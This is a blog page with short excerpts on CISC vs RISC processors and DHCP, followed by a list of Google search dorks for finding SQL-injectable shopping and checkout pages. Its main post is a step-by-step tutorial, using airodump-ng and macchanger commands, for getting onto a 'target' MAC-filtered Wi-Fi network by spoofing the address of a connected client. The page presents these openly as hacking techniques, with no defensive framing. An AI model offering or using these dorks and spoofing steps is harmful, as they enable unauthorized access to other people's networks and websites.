Skip to main content

Popular posts from this blog

CISC VS RISC computers (all details)

CISC Introduction            The term "CISC" (complex instruction set computer or computing) refers to computers designed with a full set of computer instructions that were intended to provide needed capabilities in the most efficient way. Intel's   Pentium   microprocessors are CISC microprocessors. CISC is a   processor design   where single   instructions   can execute several low-level operations (such as a load from   memory , an arithmetic   operation , and a   memory store ) or are capable of multi-step operations or   addressing modes   within single instructions. The primary goal of CISC architecture is to complete a task in as few lines of assembly as possible. This is achieved by building processor hardware that is capable of understanding & executing a series of operations, this is where our CISC architecture introduced. T...

DHCP principle , DHCP server and client communication process

1. Explain with principle: the DHCP server and client communication process DHCP stands for Dynamic Host Configuration Protocol. It handles the automatic assignment of IP addresses and other configuration settings for devices on your network. DHCP automates Network and Sharing Center in your control panel. This is especially good for people who have laptops, aren't hooked up to the Internet all the time and often move from place to place with their portable devices. They can simply get a new IP address as needed without having to do it manually. DHCP is designed to make the assignment of IP addresses and other network configuration information faster and easier. DHCP is a protocol that uses Level 4 on the OSI model. It communicates using User Datagram Protocol (UDP) datagrams through UDP Port 68. DHCP works with most current and past Windows clients, and also Linux, Macintosh, and many network-capable printers. DHCP is desi...

Google Dorks for sql injection | new 2017 |

default.php?catID= cart_additem.php?id= item_show.php?code_no= details.php?BookID= item.php?prodtype= inurl:php?id+site:it+show inurl:php?id+site:fr+show inurl:php?id+site:dk+shop inurl:php?id+site:pt+shop inurl:php?id+site:za+shop inurl:php?id+site:fi+shop acclogin.php?cartID= addToCart.php?idProduct= inurl:php?id+site:es+shop inurl:php?id+site:ro+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+checkout List.php?CatID= inurl:php?id+site:au+product inurl:php?id+site:au+succes inurl:php?id+site:uk+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+shop inurl:php?id+site:it+shop inurl:php?id+site:de+shop inurl:php?id+site:pl+shop itemdetail.php?item= inurl:php?id+site:au+checkout
                  
                                Easily bypass MAC FILTERING HAVING OPEN SECURITY
                                    --------------------------------------------------------------
hello everyone  today i m going to show how to hack mac-filtered wifi in kali linux v 2.0.....
 Check if you are in range of the wifi network you want to target......
 if it is mac-filtered wifi you cannot acess to the wifi even the network is open....

(i am trying to connect mac-filtered wifi. having open security......lets see what happens)
it is open but i cant connect to the wifi as it is mac filtered...... :(
but dont worry :) .....just follow me

Commands.....
      # airmon-ng            (check your interface if it is wlan0 or wlan1 )
      # airodump-ng wlan0        (mine is wlan0)
   press CTRL+C after you found your target network
 then type in following commands....
      airodump-ng -c BSSIDchannelNo.  --bssid XX:XX:XX:XX wlan0
       

you have wait until mac-adresses  appear below the Stations......
if you got mac adress ....press ctrl+C
copy one of the mac adress 
then type the following commands
              
           # service network-manager start
           # ifconfig wlan0 down
           # macchanger -m __paste the mac adress here__ wlan0
           # ifconfig wlan0 up  






Comments